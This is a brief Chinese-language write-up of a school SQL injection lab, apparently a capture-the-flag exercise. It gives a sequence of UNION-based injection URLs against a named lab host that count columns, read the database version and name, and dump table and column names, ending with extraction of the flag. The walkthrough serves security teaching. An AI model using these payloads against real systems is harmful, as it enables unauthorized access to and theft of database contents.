记一次学校sql靶场的过程

闭合sql语句

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man

爆列，得到八列为异常，七列为正常，即有七列。

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man' order by 1,2,3,4,5,6,7,8 -- 

回显位

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man123' union select 1,2,3,4,5,6,7 -- 

查看数据库版本、名字

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man123' union select 1,database(),version(),4,5,6,7 -- 

爆表

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man123' union select 1,2,(select group_concat(table_name)from information_schema.tables where database()=table_schema),4,5,6,7-- 

报列

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man123' union select 1,(select group_concat(column_name)from information_schema.columns where database()=table_schema and table_name='this_flag'),3,4,5,6,7 #

得到flag

代码语言：javascript复制

http://47.103.94.191:8015/sqli_1.php
?action=search&title=Iron Man123' union select 1,(select group_concat(flag)from whalwl.this_flag),3,4,5,6,7 #

数据库 sql语句 异常

0 人点赞